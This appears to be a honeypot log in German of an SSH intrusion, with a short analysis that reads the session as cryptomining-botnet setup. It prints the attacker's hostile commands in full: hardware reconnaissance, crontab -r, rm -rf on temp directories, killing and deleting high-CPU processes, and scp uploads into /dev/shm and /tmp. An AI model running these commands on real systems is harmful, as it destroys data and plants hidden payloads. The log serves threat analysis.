09.10.2026, 06:20 UTC · 85 Befehle · über ssh · Niederlande
user='guies' pass='Admin' guies@srv01:~$ uname -s -v -n -r -m Linux 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2026-07-30) proxy x86_64 guies@srv01:~$ uname -m | awk '{printf $1}' x86_64 guies@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }' up 6 days, 00:00:00 guies@srv01:~$ lspci | egrep VGA && lspci | grep 3D 0000:00:02.0 VGA compatible controller: Red Hat, Inc. Virtio GPU guies@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14- AMD EPYC 7302P 16-Core Processor guies@srv01:~$ curl ipinfo.io/org Cloudflare, Inc. guies@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1 bash: nvidia-smi: command not found guies@srv01:~$ nvidia-smi -q | grep "Product Name" bash: nvidia-smi: command not found guies@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1 0 guies@srv01:~$ uname -n | awk '{printf $1}' proxy guies@srv01:~$ uname -r | awk '{printf $1}' 5.10.0-23-amd64 guies@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d… bash: cache: command not found guies@srv01:~$ echo Admin > /tmp/d.log guies@srv01:~$ scp -qt "/var/tmp/GziEQEkk" guies@srv01:~$ scp -qt "/tmp/GziEQEkk" guies@srv01:~$ uname -s -v -n -r -m Linux 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2026-07-30) proxy x86_64 guies@srv01:~$ scp -qt "/dev/shm/GziEQEkk" guies@srv01:~$ echo 123123 > /tmp/d.log guies@srv01:~$ scp -qt "/var/tmp/CQXUTlms" guies@srv01:~$ scp -qt "/tmp/CQXUTlms" guies@srv01:~$ scp -qt "/dev/shm/CQXUTlms" guies@srv01:~$ uname -s -v -n -r -m Linux 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2026-07-30) proxy x86_64 guies@srv01:~$ echo admin > /tmp/d.log guies@srv01:~$ scp -qt "/var/tmp/HEnAlfKf" guies@srv01:~$ scp -qt "/tmp/HEnAlfKf" guies@srv01:~$ scp -qt "/dev/shm/HEnAlfKf" guies@srv01:~$ uname -s -v -n -r -m Linux 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2026-07-30) proxy x86_64 guies@srv01:~$ echo mcserver > /tmp/d.log guies@srv01:~$ scp -qt "/var/tmp/UsyDADaN" guies@srv01:~$ scp -qt "/tmp/UsyDADaN" guies@srv01:~$ scp -qt "/dev/shm/UsyDADaN" guies@srv01:~$ uname -s -v -n -r -m Linux 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2026-07-30) proxy x86_64 guies@srv01:~$ echo test1234 > /tmp/d.log guies@srv01:~$ scp -qt "/var/tmp/yqvcAvjL" guies@srv01:~$ scp -qt "/tmp/yqvcAvjL" guies@srv01:~$ scp -qt "/dev/shm/yqvcAvjL" guies@srv01:~$ uname -s -v -n -r -m Linux 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2026-07-30) proxy x86_64 guies@srv01:~$ echo andreas > /tmp/d.log guies@srv01:~$ scp -qt "/var/tmp/NPPrCvMX"
Ein Angreifer meldete sich mit schwachen Zugangsdaten über SSH an. Er führte eine Reihe von Systemabfragen durch, um Hardware, CPU und Netzwerkdetails zu ermitteln. Anschließend löschte er temporäre Dateien, beendete ressourcenintensive Prozesse und lud mehrere Dateien in verschiedene Systemverzeichnisse hoch.
Die Befehle uname, lspci und lscpu sammeln Informationen über das Betriebssystem, die Grafikkarte und den Prozessor. Der Aufruf von nvidia-smi prüft auf NVIDIA-GPUs, was für Mining relevant ist. Der komplexe Befehl mit crontab und ps löscht alte Cronjobs, räumt Temp-Verzeichnisse auf und beendet Prozesse, die mehr als 40 Prozent CPU oder 60 Prozent RAM nutzen. Die scp-Kommandos kopieren Dateien in Verzeichnisse wie /var/tmp und /dev/shm, um sie vor Entdeckung zu verstecken.
Das Vorgehen deutet auf die Vorbereitung eines Kryptomining-Botnets hin. Die Abfrage nach Grafikkarten und die Löschung konkurrierender Prozesse sind typische Schritte, um Rechenkapazität freizumachen. Die hochgeladenen Dateien dienen vermutlich als Mining-Software oder Persistenz-Mechanismen.
Dieses Muster ist sehr verbreitet und folgt einem bekannten Skript für automatisierte Mining-Angriffe. Die Kombination aus Hardware-Scan, Prozess-Kill und Datei-Upload ist ein Standardverfahren für Botnet-Ausbreitung.